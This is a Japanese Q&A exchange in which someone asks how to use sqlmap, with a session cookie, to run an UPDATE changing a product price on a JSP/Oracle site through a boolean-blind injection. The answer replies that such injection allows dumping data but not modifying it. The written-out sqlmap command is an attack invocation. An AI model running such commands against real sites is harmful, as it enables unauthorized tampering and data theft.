sqlmapを使用して、スタックされたクエリなしでテーブルを更新する方法
私は次のコードを使用しようとしています
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price"
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'"
以前にこのリンクを確認しましたが、infoパラメータ(ブール型ブラインド)に挿入できます。上記のコードの実行結果は次のとおりです。
warning: "execution of custom SQL queries is only available when stacked queries are supported"
これを行うための回避策はありますか?
このWebサイトは、Apache、JSP、およびOracleで実行されています。
ここでは回避策はありません。通常、データベース全体をブールベースのSQLインジェクションの脆弱性でダンプできますが、更新を実行することはできません。
既存のデータを抽出することはできますが、挿入または変更することはできません。